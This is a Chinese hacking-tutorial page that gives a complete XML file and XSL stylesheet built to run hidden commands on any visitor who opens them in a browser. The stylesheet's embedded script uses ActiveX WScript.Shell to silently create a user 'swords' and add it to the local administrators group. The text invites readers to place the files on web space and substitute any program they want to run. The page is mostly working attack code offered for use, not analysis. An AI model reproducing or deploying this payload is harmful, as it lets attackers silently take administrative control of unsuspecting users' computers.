手机
当前位置:查字典教程网 >实用技巧 >漏洞研究 >利用xml+xsl给客户机添加超级管理帐户!
利用xml+xsl给客户机添加超级管理帐户!
摘要:用法:把swords.xml和swords.xsl放在一个普通空间,相信很少人会注意xml的安全性吧,嘎嘎,只要把你想运行的程序添加到run...

用法:把swords.xml和swords.xsl放在一个普通空间,相信很少人会注意xml的安全性吧,嘎嘎,只要把你想运行的程序添加到run() 即可,默认支持js和vbs.

这个程序加了一个用户为 swords,密码为est的超级管理员账号。

swords.xml

<?xml version="1.0" encoding="GB2312"?>

<?xml-stylesheet type="text/xsl" href="swords.xsl"?>

<name>I am swords,I am admin!</name>

swords.xsl

<?xml version="1.0" encoding="gb2312"?>

<xsl:stylesheet xmlns:xsl="http://www.w3.org/TR/WD-xsl">

<xsl:template match="/">

<html>

<body>

<xsl:value-of select="name" />

<xsl:script>

function run()

{

var wsh;

var wsh = new ActiveXObject("WScript.Shell");

wsh.run( "net user swords est /add",0);

wsh.run( "net localgroup administrators swords /add",0);

wsh.run( "cmd.exe /c echo test!");

}

</xsl:script>

<xsl:eval>run()</xsl:eval>

</body>

</html>

</xsl:template>

</xsl:stylesheet>

【利用xml+xsl给客户机添加超级管理帐户!】相关文章:

记一次巧妙的hacking

再探九酷网络个人主页空间管理系统

对Serv-U 6.0.0.2默认帐户及密码的一点理解

Serv-U本地权限提升的ASP版实现

ADSL密码大集合

UBB的跨站脚本攻击的漏洞

晓宇听幽网站内容管理系统 V2.0

新法远程控制 木马病毒瞄准Word

黑客之门的魅力:感染与加载(图)

UPDATE注射(mysql+php)的两个模式

精品推荐
分类导航